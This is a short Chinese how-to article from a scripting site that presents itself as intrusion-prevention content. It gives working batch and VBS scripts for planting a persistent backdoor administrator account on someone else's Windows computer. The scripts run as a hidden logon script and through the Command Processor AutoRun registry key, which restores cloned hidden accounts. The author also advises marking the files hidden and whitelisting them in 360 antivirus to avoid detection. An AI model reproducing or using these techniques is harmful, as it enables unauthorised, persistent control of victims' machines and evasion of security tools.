入侵防御

关注公众号 jb51net

关闭
网络安全 > 入侵防御 >

windows下建立永久帐号方法

脚本之家

操作步骤:

1、在自己电脑里面建立一个.txt文本文件.
2、在里面输入内容:

@echo off
net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码;
net localgroup administrators xixi /add

3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat;
4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。别忘了将文件属性设为“隐藏”哦!

完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!

如果把里面的内容改成:

@echo off
net user administrator 123456 /add

意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456

作者:xixi

逍遥复仇点评:以上应该对应的就是组策略里计算机管理中的“登录”和“注销”脚本,打开gpedit.msc找找看,听说此法360能检测出来,我是没有试,你可以先用360扫一下如果能查出来将其设为信任就OK了!

强调一下本文貌似要配合《安静运行批处理vbs脚本》才算是完美!既然都走到这里了《建立超级隐藏账号方法》这篇也一起看了吧!

==================================================================

另外一种命令行截持重建帐号的方法:

将已在注册中克隆好的帐号分别导出一份,比如"guest$.reg"和"0x3f5.reg"复制c:\windows\目录下,然后在同目录下建立一个cmd.vbs脚本内容如下:

On Error Resume Next
set yecha=wscript.createobject("wscript.shell")
yecha.run "regedit.exe /s guest$.reg",0
yecha.run "regedit.exe /s 0x3f5.reg",0

在注册表中这个项KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun里AutoRun键值中输入我们的脚本路径就OK。

(这个项起的作用是打开CMD自动运行我们编辑好的脚本文件)

提示:360安全卫士能查的出来显示为“命令行截持”,TNND,我把它加入信任了就没事了,管理员神精了会天天翻360那个不起眼的地方?

整理作者:逍遥复仇